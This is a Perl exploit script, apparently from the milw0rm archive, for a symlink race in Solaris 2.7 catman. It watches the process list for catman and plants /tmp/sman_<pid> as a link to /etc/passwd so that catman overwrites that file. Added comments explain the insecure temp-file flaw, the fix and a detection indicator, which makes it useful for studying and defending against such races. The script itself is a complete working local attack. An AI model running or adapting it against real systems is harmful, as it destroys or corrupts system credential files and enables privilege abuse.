#!/usr/local/bin/perl -w
#
# The problem is catman creates files in /tmp
# insecurely. Their names are based on the PID of the
# catman process, and catman will happily clobber
# any file that is symlinked to that name.
# The idea of this script is to watch the
# process list for the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered. This exploit depends
# on system speed and process load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000 Vapid Labs.
# http://vapid.betteros.org
# Path the planted symlink points at; whatever catman later writes to its
# /tmp file lands here. This file has no `use strict`/`use warnings`, so
# $clobber and @args below are package globals.
$clobber = "/etc/passwd";
# Poll the process table until a catman process appears. This is the
# time-of-check/time-of-use half of a symlink race: the link must be
# planted after catman's PID is known but before catman opens
# /tmp/sman_<pid>. From a defender's view, a script that forks `ps`
# in a tight loop like this is itself a noisy, detectable behaviour.
while(1) {
# Pipe from `ps -ef`, dropping the grep processes and the header row.
# Review notes: bareword filehandle, 2-arg pipe open that goes through
# the shell, and the open's return value is never checked.
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
# Whitespace-split the `ps -ef` columns; with the header filtered out,
# field 1 is the PID column (ps -ef prints UID PID PPID ...).
@args = split " ", $_;
# Any process line containing "catman" triggers the link, not only a
# real catman binary - the match is on the whole ps line in $_.
if (/catman/) {
print "Symlinking sman_$args[1] to $clobber\n";
# Plant /tmp/sman_<pid> -> $clobber. symlink's return value is not
# checked, so an existing entry or a permission error is silently
# ignored. Root cause being exploited (per the header comment): catman
# derives its temp-file name from its PID and follows symlinks, i.e.
# insecure temporary file creation (CWE-377) and link following
# (CWE-59). The fix belongs in catman, not here: create temp files
# with mkstemp-style O_CREAT|O_EXCL (and O_NOFOLLOW where available)
# in a private directory. A symlink in /tmp named sman_<pid> pointing
# at a system file is a high-confidence indicator of this attack.
symlink($clobber,"/tmp/sman_$args[1]");
# Exits after the first attempt, successful or not, with status 1.
exit(1);
}
}
}
# milw0rm.com [2000-12-20]